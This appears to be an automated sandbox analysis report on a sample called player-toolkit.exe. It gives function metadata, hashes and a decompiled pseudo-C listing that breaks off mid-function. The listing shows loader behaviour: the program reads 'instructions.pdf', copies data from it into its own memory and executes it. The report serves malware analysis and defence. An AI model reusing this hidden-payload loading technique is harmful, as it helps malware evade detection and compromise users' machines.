Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv$Xinvalid_argumentallocatorstd::_
String ID: ,qh$A
API String ID: 1533053795-1487724106
Opcode ID: ffce0460abf4fcdf24912b688c45e6f1a18504124ff8a63245d8a07f27bab4ce
Instruction ID: 23342d25a0ac2dfe499479d167cb91b511f50c24d48e8e00414861ba68dc0210
Opcode Fuzzy Hash: ffce0460abf4fcdf24912b688c45e6f1a18504124ff8a63245d8a07f27bab4ce
Instruction Fuzzy Hash: 70519171D04248AFDB11DFA4CC81BDEB7BDEB48710F20422AF525AB2C2DB356945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 000406B0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 000404D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000404EA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00040704

Part of subcall function 00042E90: GetTimeZoneInformation.KERNEL32(?), ref: 00042EAA

Strings

cannot get local time, xrefs: 000407EE
,qh, xrefs: 0004071D, 00040723

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InformationTimeZone
String ID: ,qh$cannot get local time
API String ID: 2478586550-3772751549
Opcode ID: b693f2d7a715ac9994542c5752b92469a0eebdd0b92baa80f166a50bbacc9485
Instruction ID: f8e4a3c21e1c87b4889d81f0953944bf2420d2a52a45c4d62095de0c30262a5f
Opcode Fuzzy Hash: b693f2d7a715ac9994542c5752b92469a0eebdd0b92baa80f166a50bbacc9485
Instruction Fuzzy Hash: DD4180B1D00618AECB24DFA4CC41BEEBBF8FB48710F10452EF916A2652EB34A644CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00015C60, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 00015D24

Strings

,qh, xrefs: 00015C7F, 00015DA4, 00015A80
ios_base::badbit set, xrefs: 00015C19, 00015C42, 00015C75

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Initstd::locale::_
String ID: ,qh$ios_base::badbit set
API String ID: 1620887387-3408843165
Opcode ID: 857d48ab65d56dba948c4cfbe88e5bbb1d4b1eb687ac899dab7c3fc87f521164
Instruction ID: 9bbd5650a9fc7317a182b3bbf54d9db35a9215a4efba8bffc8d1944d15e3d77c
Opcode Fuzzy Hash: 857d48ab65d56dba948c4cfbe88e5bbb1d4b1eb687ac899dab7c3fc87f521164
Instruction Fuzzy Hash: 1A4122B1900314DFDB11CF44C984B8ABBF4FB08314F1185AAE815AF396D3B6AA48CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00015E40, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00015E6B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00015EBA

Part of subcall function 000E69D8: _Yarn.LIBCPMT ref: 000E69F7
Part of subcall function 000E69D8: _Yarn.LIBCPMT ref: 000E6A1B

Strings

bad locale name, xrefs: 00015ED6

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 748ea451ccf26062a5c904c340862b61ca3c01193a63e74e062475df131b7818
Instruction ID: 81955229bf0dca329c2b24c91410fbdbb869b423dc3d09e78e75ee9a9ea8c989
Opcode Fuzzy Hash: 748ea451ccf26062a5c904c340862b61ca3c01193a63e74e062475df131b7818
Instruction Fuzzy Hash: 31118F71504B84DFD320CF69C901747BBF4EB19710F004A1EE49997B81D775A5048B91

Uniqueness

Uniqueness Score: -1.00%

Function 00033270, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 000332D5
task.LIBCPMTD ref: 000332E4

Part of subcall function 00033320: std::locale::_Init.LIBCPMT ref: 00033409

Part of subcall function 000E80AA: RaiseException.KERNEL32(E06D7363,00000001,00000003,00011DBC,?,?,?,00011DBC,?,001A0EB0), ref: 000E810A

Strings

NULL pointer: , xrefs: 000332A7

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: task$ExceptionInitRaisestd::locale::_
String ID: NULL pointer:
API String ID: 578683977-1979332658
Opcode ID: ef832f988c5f9654f5a48736b8a437b4ea418a5449bfa1fce8adcb91b6df6857
Instruction ID: 47b12c7393553028e5f60f9047e41a2b883e58949a89f6162ba259aac253edae
Opcode Fuzzy Hash: ef832f988c5f9654f5a48736b8a437b4ea418a5449bfa1fce8adcb91b6df6857
Instruction Fuzzy Hash: ED116AB580020CBACB10EBA4CC46FDFBBBCEB09764F504545F914A7282DB346A448AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00011AF0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(00000000,00000000,001AE548,?,0001100D), ref: 00011AFB

Part of subcall function 00011AA0: GetModuleFileNameA.KERNEL32(00000000,?,00000080), ref: 00011AC1
Part of subcall function 00011AA0: GetActiveWindow.USER32 ref: 00011AD4
Part of subcall function 00011AA0: MessageBoxA.USER32 ref: 00011ADB

ExitProcess.KERNEL32 ref: 00011B14

Strings

This application requires an OS that supports Unicode., xrefs: 00011B05

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: ActiveDirectoryExitFileMessageModuleNameProcessWindowWindows
String ID: This application requires an OS that supports Unicode.
API String ID: 1872603699-1456877595
Opcode ID: c49ef8ca873c83d47e2b5e7189252f40de3821e4344605c456272482f47bb171
Instruction ID: f5a4b58cc18e21d94f8019bea3cd527ad83c0c0e4f429dc5ec9efb9d10636031
Opcode Fuzzy Hash: c49ef8ca873c83d47e2b5e7189252f40de3821e4344605c456272482f47bb171
Instruction Fuzzy Hash: ABD05E70B88308BBF744EFD1BC07F9D77A8EB08B92F400054FA09962C1F6A16D804556

Uniqueness

Uniqueness Score: -1.00%

Function 00128870, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00128875

Part of subcall function 000E665E: std::invalid_argument::invalid_argument.LIBCONCRT ref: 000E666A

Strings

vector<bool> too long, xrefs: 00128870
invalid deque<T> subscript, xrefs: 00128880

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID: invalid deque<T> subscript$vector<bool> too long
API String ID: 1997705970-1917608184
Opcode ID: 4805dcee94851426315ceb9f9cd28208176055f14bac9fb372919fcaee92c42f
Instruction ID: 2ad620c202f8ff26f074f739ac3e25d5d258d5a44c26105473baefa5291f5720
Opcode Fuzzy Hash: 4805dcee94851426315ceb9f9cd28208176055f14bac9fb372919fcaee92c42f
Instruction Fuzzy Hash: 42A002002E87887A8C0832B6384F8C892014FB0BD0F305C51B63520DC34F8307B10BB7

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: player-toolkit.exe PID: 5452 Parent PID: 3388 player-toolkit.exeCOMMON

Executed Functions

Function 6E4F6E50, Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 426
windowCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E6E4F6E50(void* __ebx, signed int __edx, void* __edi, void* __eflags) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int* _v36;
				char _v39;
				char* _v40;
				CHAR* _v44;
				signed int _v48;
				signed int _v52;
				char _v60;
				short _v2108;
				CHAR* _v2116;
				CHAR* _v2120;
				signed int _v2124;
				intOrPtr _v2128;
				signed int _v2132;
				signed int _v2148;
				struct tagMSG _v2176;
				signed int _v2180;
				signed int _v2184;
				signed int _v2188;
				signed int _v2192;
				signed int _v2196;
				void* _v2200;
				signed int _v2204;
				signed int _v2256;
				intOrPtr _v2260;
				intOrPtr _v2276;
				signed int _v2280;
				intOrPtr _v2292;
				signed int _v2296;
				signed int* _v2300;
				intOrPtr _v2304;
				intOrPtr _v2308;
				signed int _v2324;
				intOrPtr _v2328;
				void* __esi;
				signed int _t211;
				void* _t222;
				void* _t223;
				void* _t227;
				void* _t229;
				void* _t230;
				void* _t233;
				void* _t234;
				signed int _t237;
				void* _t252;
				CHAR* _t254;
				signed int _t262;
				char* _t263;
				signed int _t264;
				signed int _t270;
				intOrPtr _t272;
				signed int _t278;
				intOrPtr _t292;
				signed int _t293;
				intOrPtr _t296;
				signed int _t301;
				void* _t310;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t317;
				signed int _t326;
				signed int _t327;
				signed int _t331;
				void* _t334;
				signed int _t337;
				signed int _t339;
				intOrPtr _t341;
				signed int _t349;
				signed int _t353;
				intOrPtr _t354;
				void* _t357;
				signed int _t359;
				void* _t365;
				signed int _t366;
				unsigned int _t370;
				signed int _t372;
				signed int _t374;
				signed int _t378;
				signed int _t389;
				signed int _t393;
				intOrPtr _t394;
				signed int _t395;
				unsigned int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t401;
				intOrPtr _t402;
				void* _t403;
				signed int _t404;
				char* _t412;
				signed int _t414;
				signed int _t422;
				signed int _t426;
				void* _t427;
				signed int _t428;
				signed int _t429;
				intOrPtr _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				intOrPtr _t435;
				signed int _t437;
				intOrPtr _t441;
				unsigned int _t445;
				signed int _t446;
				intOrPtr _t447;
				unsigned int _t457;
				intOrPtr _t458;
				void* _t459;
				signed int _t461;
				signed int _t463;
				signed int _t468;
				intOrPtr _t471;
				signed int _t472;
				signed int _t473;
				unsigned int _t474;
				signed int _t480;
				signed int _t482;
				signed int _t484;
				void* _t487;
				void* _t489;
				void* _t491;
				char* _t492;
				signed int _t493;
				signed int _t494;
				signed int _t496;
				signed int _t497;
				signed int _t499;
				void* _t506;
				void* _t507;
				signed int _t511;
				void* _t513;
				void* _t514;
				void* _t517;
				void* _t518;
				void* _t528;
				signed int _t531;
				void* _t534;
				void* _t543;
				void* _t546;
				void* _t548;
				void* _t551;
				void* _t558;
				void* _t559;
				void* _t561;

				_t558 = __eflags;
				_t433 = __edx;
				_push(__ebx);
				_t365 = _t528;
				_t531 = (_t528 - 0x00000008 & 0xfffffff0) + 4;
				_v8 =  *((intOrPtr*)(_t365 + 4));
				_t511 = _t531;
				_t211 =  *0x6e688c24; // 0x8e9367b0
				_v16 = _t211 ^ _t511;
				_push(__edi);
				GetModuleFileNameW(0,  &_v2108, 0x400);
				 *((short*)(E6E5309A6( &_v2108, 0x5c))) = 0;
				SetCurrentDirectoryW( &_v2108);
				_v2180 = 0;
				E6E53444B(_t365, __edi,  &_v2180, "instructions.pdf", "rb"); // executed
				_t534 = _t531 - 0x894 + 0x14;
				_t461 = E6E52D4ED(0, _t433, _t558);
				_t482 = _t433;
				_v2188 = _t461;
				_v2192 = _t482;
				_t222 = E6E52D4D6(0);
				_push(_t365);
				_push(_t482);
				_push(_t461);
				_push(_t433);
				_t223 = E6E611D20();
				_t366 = _t222;
				_v2196 = E6E530050(_t223, _t433, 0x3b9aca00, 0);
				_v2184 = _t433;
				_t227 = E6E611C70(E6E530050(0, _t365, 0x3b9aca00, 0), _t433, _v2188, _v2192) + _v2196;
				_t377 = _t433;
				asm("adc ecx, [ebp-0x87c]");
				_t559 = _t377 - 0x7ffffff2;
				if(_t559 > 0) {
					L4:
					_v2184 = 0xffffffff;
					_v2196 = 0x7fffffff;
				} else {
					if(_t559 < 0) {
						L3:
						_v2184 = _t227 + 0xf8475800;
						asm("adc ecx, 0xd");
						_v2196 = _t377;
					} else {
						_t560 = _t227 - 0x7b8a7ff;
						if(_t227 >= 0x7b8a7ff) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				asm("movsd xmm0, [0x6e682f90]");
				asm("movsd [ebp-0x840], xmm0");
				while(1) {
					_t463 = E6E52D4ED(_t377, _t433, _t560);
					_t484 = _t433;
					_v2188 = _t463;
					_v2192 = _t484;
					_t229 = E6E52D4D6(_t377);
					_push(_t366);
					_push(_t484);
					_push(_t463);
					_push(_t433);
					_t230 = E6E611D20();
					_t366 = _t229;
					_v2200 = E6E530050(_t230, _t433, 0x3b9aca00, 0);
					_v2204 = _t433;
					_t233 = E6E611C70(E6E530050(_t377, _t366, 0x3b9aca00, 0), _t433, _v2188, _v2192);
					_t378 = _v2184;
					_t487 = _t233 + _v2200;
					_t465 = _t433;
					_t434 = _v2196;
					asm("adc edi, [ebp-0x890]");
					_t561 = _t433 - _t434;
					if(_t561 > 0 || _t561 >= 0 && _t487 >= _t378) {
						_t234 = 1;
					} else {
						_t234 = 0;
					}
					if(_t234 != 0) {
						break;
					}
					_t432 = _t378 - _t487;
					_t560 = _t432;
					_v2188 = _t432;
					asm("sbb edx, edi");
					_v2192 = _t434;
					_t357 = E6E530050(E6E52D565(), _t434, 0x64, 0);
					_t377 = _v2188;
					_t480 = _t434;
					_t433 = _v2192;
					_t506 = _t357;
					L6E52F690(_t357, _v2188);
					asm("comisd xmm0, [ebp-0x840]");
					if(_t432 <= 0) {
						_t507 = _t506 + _v2188;
						asm("adc edi, [ebp-0x884]");
					} else {
						_t507 = _t506 + 0xad160000;
						asm("adc edi, 0x311cd");
					}
					_t359 = E6E611C70(_t507, _t480, 0x3b9aca00, 0);
					_v52 = _t359;
					_v48 = _t433;
					_v44 = _t507 - _t359 * 0x3b9aca00;
					E6E52D6CA(_t377, _t433,  &_v52); // executed
					_t534 = _t534 + 4;
				}
				_t235 = _v2180;
				__eflags = _v2180;
				if(__eflags == 0) {
					L38:
					_t237 = GetMessageW( &_v2176, 0, 0, 0);
					__eflags = _t237;
					while(_t237 != 0) {
						__eflags = _t237 - 0xffffffff;
						if(_t237 != 0xffffffff) {
							TranslateMessage( &_v2176);
							DispatchMessageW( &_v2176);
						}
						_t237 = GetMessageW( &_v2176, 0, 0, 0);
						__eflags = _t237;
					}
					__eflags = _v16 ^ _t511;
					_pop(_t489);
					return E6E52F227(_v16 ^ _t511, _t489);
				} else {
					E6E5341C8(_t434, _t235, 0, 2);
					_t468 = E6E52F276(E6E533EE6(_t366, _t434, _t465, _t487, __eflags, _v2180), __eflags, _t245 * 4);
					_v2204 = _t468;
					_push(_v2180);
					E6E5341E3(_t366, _t434, _t468, _t245, __eflags);
					E6E534678(_t468, 1, _t245, _v2180);
					E6E4F9000(_t245 * 4, 0x200002, 0, 0);
					E6E4F9000(_t245 * 4, 0, 0, 0);
					 *((intOrPtr*)(_t468 + 0x5a59)) = _t468;
					_t252 = GetModuleHandleA(0) + 0x1200;
					_v44 = 0;
					_t491 = _t468 + 0x53b6;
					_v2184 = _t252;
					_v2200 = _t252;
					_v40 = 0xf;
					memcpy(_t252, _t491, 0x1bf << 2);
					_t543 = _t534 + 0x4c;
					_t471 = _t491 + 0x37e;
					_push(4);
					_push("info");
					_v2124 = 0;
					_v2120 = 0;
					_v2116 = 0;
					_v60 = 0;
					L51();
					_t254 = _v2120;
					__eflags = _t254 - _v2116;
					if(_t254 == _v2116) {
						_push( &_v60);
						_push(_t254);
						L86();
						_t435 = _v40;
					} else {
						asm("movups xmm0, [ebp-0x30]");
						 *(_t254 + 0x10) = 0;
						_t435 = 0xf;
						_v60 = 0;
						asm("movups [eax], xmm0");
						asm("movq xmm0, [ebp-0x20]");
						asm("movq [eax+0x10], xmm0");
						_v2120 =  &(_v2120[0x18]);
					}
					__eflags = _t435 - 0x10;
					if(_t435 < 0x10) {
						L24:
						_t492 =  &_v39;
						do {
							_t492 = _t492 - 1;
							_t437 = 0xcccccccd * _v2184 >> 0x20 >> 3;
							 *_t492 = _v2184 - (_t437 << 2) + _t437 + (_t437 << 2) + _t437 + 0x30;
							_t262 = _t437;
							_v2184 = _t262;
							__eflags = _t262;
						} while (_t262 != 0);
						_t263 =  &_v39;
						_v2132 = _t437;
						_v2148 = _t437;
						_t471 = 0xf;
						_v2128 = 0xf;
						__eflags = _t492 - _t263;
						if(_t492 != _t263) {
							_t353 = _t263 - _t492;
							__eflags = _t353;
							_push(_t353);
							_push(_t492);
							L51();
							_t471 = _v2128;
						}
						_t264 = _v2204;
						__eflags =  *((char*)(_t264 + 0x5a61));
						if( *((char*)(_t264 + 0x5a61)) != 0) {
							 *_v2200();
						}
						__eflags = _t471 - 0x10;
						if(_t471 < 0x10) {
							L34:
							_t389 = _v2124;
							__eflags = _t389;
							if(_t389 == 0) {
								goto L38;
							} else {
								_push(_t389);
								L107();
								_t493 = _v2124;
								_t543 = _t543 + 4;
								_t270 = _t493;
								_t393 = (0x2aaaaaab * (_v2116 - _t493) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v2116 - _t493) >> 0x20 >> 2) + ((0x2aaaaaab * (_v2116 - _t493) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v2116 - _t493) >> 0x20 >> 2)) * 2 << 3;
								__eflags = _t393 - 0x1000;
								if(_t393 < 0x1000) {
									L37:
									_push(_t393);
									_push(_t493);
									L122();
									goto L38;
								} else {
									_t493 =  *(_t493 - 4);
									_t393 = _t393 + 0x23;
									_t272 = _t270 - _t493 + 0xfffffffc;
									__eflags = _t272 - 0x1f;
									if(_t272 > 0x1f) {
										goto L44;
									} else {
										goto L37;
									}
								}
							}
						} else {
							_t429 = _v2148;
							_t471 = _t471 + 1;
							_t349 = _t429;
							__eflags = _t471 - 0x1000;
							if(_t471 < 0x1000) {
								L33:
								_push(_t471);
								_push(_t429);
								L122();
								_t543 = _t543 + 8;
								goto L34;
							} else {
								_t393 =  *(_t429 - 4);
								_t471 = _t471 + 0x23;
								_t272 = _t349 - _t393 + 0xfffffffc;
								__eflags = _t272 - 0x1f;
								if(_t272 > 0x1f) {
									goto L44;
								} else {
									goto L33;
								}
							}
						}
					} else {
						_t431 = _v60;
						_t459 = _t435 + 1;
						_t354 = _t431;
						__eflags = _t459 - 0x1000;
						if(_t459 < 0x1000) {
							L23:
							_push(_t459);
							_push(_t431);
							L122();
							_t543 = _t543 + 8;
							goto L24;
						} else {
							_t393 =  *(_t431 - 4);
							_t459 = _t459 + 0x23;
							_t272 = _t354 - _t393 + 0xfffffffc;
							__eflags = _t272 - 0x1f;
							if(_t272 > 0x1f) {
								L44:
								L123();
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t493);
								_t494 = _t393;
								_t394 =  *((intOrPtr*)(_t494 + 0x14));
								__eflags = _t394 - 0x10;
								if(_t394 < 0x10) {
									L49:
									 *(_t494 + 0x10) = 0;
									 *((intOrPtr*)(_t494 + 0x14)) = 0xf;
									 *_t494 = 0;
									return _t272;
								} else {
									_t272 =  *_t494;
									_t395 = _t394 + 1;
									__eflags = _t395 - 0x1000;
									if(_t395 < 0x1000) {
										L48:
										_push(_t395);
										_push(_t272);
										L122();
										goto L49;
									} else {
										_t441 =  *((intOrPtr*)(_t272 - 4));
										_t395 = _t395 + 0x23;
										__eflags = _t272 - _t441 + 0xfffffffc - 0x1f;
										if(_t272 - _t441 + 0xfffffffc > 0x1f) {
											L123();
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t511);
											_t513 = _t543;
											_t546 = _t543 - 0xc;
											_t275 = _v2260;
											_push(_t366);
											_push(_t494);
											_t496 = _t395;
											_v2276 = _v2260;
											_push(_t471);
											_t472 = _v2256;
											_t396 =  *(_t496 + 0x14);
											_v2280 = _t396;
											__eflags = _t472 - _t396;
											if(_t472 > _t396) {
												__eflags = _t472 - 0x7fffffff;
												if(__eflags > 0) {
													L75:
													E6E4F6E20(__eflags);
													goto L76;
												} else {
													_t372 = _t472 | 0x0000000f;
													__eflags = _t372 - 0x7fffffff;
													if(__eflags <= 0) {
														_t457 = _t396 >> 1;
														__eflags = _t396 - 0x7fffffff - _t457;
														if(__eflags <= 0) {
															_t334 = _t457 + _t396;
															__eflags = _t372 - _t334;
															_t366 =  <  ? _t334 : _t372;
															__eflags = _t366;
														} else {
															_t366 = 0x7fffffff;
														}
													} else {
														_t366 = 0x7fffffff;
													}
													_t426 =  ~(0 | __eflags > 0x00000000) | _t366 + 0x00000001;
													__eflags = _t426 - 0x1000;
													if(_t426 < 0x1000) {
														__eflags = _t426;
														if(__eflags == 0) {
															_t337 = 0;
															__eflags = 0;
														} else {
															_t337 = E6E52F238(_t496, __eflags, _t426);
															_t546 = _t546 + 4;
														}
														goto L68;
													} else {
														_t118 = _t426 + 0x23; // 0x23
														_t344 = _t118;
														__eflags = _t118 - _t426;
														if(__eflags <= 0) {
															L76:
															E6E4F6D50();
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t513);
															_t514 = _t546;
															_t278 = _v2280;
															__eflags = _t278 - 0x1000;
															if(_t278 < 0x1000) {
																__eflags = _t278;
																if(__eflags == 0) {
																	__eflags = 0;
																	return 0;
																} else {
																	return E6E52F238(_t496, __eflags, _t278);
																}
															} else {
																_t397 = _t278 + 0x23;
																__eflags = _t397 - _t278;
																if(__eflags <= 0) {
																	E6E4F6D50();
																	goto L85;
																} else {
																	_t397 = E6E52F238(_t496, __eflags, _t397);
																	_t546 = _t546 + 4;
																	__eflags = _t397;
																	if(_t397 == 0) {
																		L85:
																		L123();
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		_push(_t514);
																		_t517 = _t546;
																		_t548 = _t546 - 0x14;
																		_v2304 = _v2276;
																		_push(_t366);
																		_t368 = _t397;
																		_t398 = _v2280;
																		_push(_t496);
																		_v2296 = _t398;
																		_push(_t472);
																		_t473 =  *_t368;
																		_t401 = _t368[1] - _t473;
																		_v2300 = _t368;
																		_v2292 = (0x2aaaaaab * (_t398 - _t473) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t398 - _t473) >> 0x20 >> 2);
																		_t445 = 0x2aaaaaab * _t401 >> 0x20 >> 2;
																		_t292 = (_t445 >> 0x1f) + _t445;
																		_v2308 = _t292;
																		__eflags = _t292 - 0xaaaaaaa;
																		if(__eflags == 0) {
																			L105:
																			_t293 = E6E4F7870(_t445, __eflags);
																			goto L106;
																		} else {
																			_t496 = _t292 + 1;
																			_t401 = (0x2aaaaaab * (_t368[2] - _t473) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t368[2] - _t473) >> 0x20 >> 2);
																			_t445 = _t401 >> 1;
																			__eflags = _t401 - 0xaaaaaaa - _t445;
																			if(_t401 > 0xaaaaaaa - _t445) {
																				L104:
																				E6E4F6D50();
																				goto L105;
																			} else {
																				_t310 = _t445 + _t401;
																				__eflags = _t310 - _t496;
																				_t401 =  >=  ? _t310 : _t496;
																				__eflags = _t401 - 0xaaaaaaa;
																				if(_t401 > 0xaaaaaaa) {
																					goto L104;
																				} else {
																					_t473 = _t401 + _t401 * 2 << 3;
																					__eflags = _t473 - 0x1000;
																					if(_t473 < 0x1000) {
																						__eflags = _t473;
																						if(__eflags == 0) {
																							_t496 = 0;
																							__eflags = 0;
																						} else {
																							_t327 = E6E52F238(_t496, __eflags, _t473);
																							_t548 = _t548 + 4;
																							_t496 = _t327;
																						}
																						goto L96;
																					} else {
																						_t159 = _t473 + 0x23; // 0x6e4f71c0
																						_t328 = _t159;
																						__eflags = _t159 - _t473;
																						if(__eflags <= 0) {
																							goto L104;
																						} else {
																							_t293 = E6E52F238(_t496, __eflags, _t328);
																							_t548 = _t548 + 4;
																							__eflags = _t293;
																							if(_t293 == 0) {
																								L106:
																								L123();
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								_push(_t517);
																								_t518 = _t548;
																								_push(_t496);
																								_push(_t473);
																								_t474 = _t445;
																								_t497 = _t401;
																								__eflags = _t497 - _t474;
																								if(_t497 == _t474) {
																									L115:
																									return _t293;
																								} else {
																									do {
																										_t402 =  *((intOrPtr*)(_t497 + 0x14));
																										__eflags = _t402 - 0x10;
																										if(_t402 < 0x10) {
																											goto L114;
																										} else {
																											_t293 =  *_t497;
																											_t403 = _t402 + 1;
																											__eflags = _t403 - 0x1000;
																											if(_t403 < 0x1000) {
																												L113:
																												_push(_t403);
																												_push(_t293);
																												L122();
																												_t548 = _t548 + 8;
																												goto L114;
																											} else {
																												_t446 =  *(_t293 - 4);
																												_t403 = _t403 + 0x23;
																												__eflags = _t293 - _t446 + 0xfffffffc - 0x1f;
																												if(_t293 - _t446 + 0xfffffffc > 0x1f) {
																													L123();
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													_push(_t518);
																													_t404 = _v2324;
																													_t296 = _v2328;
																													__eflags = _t404 - 0x1000;
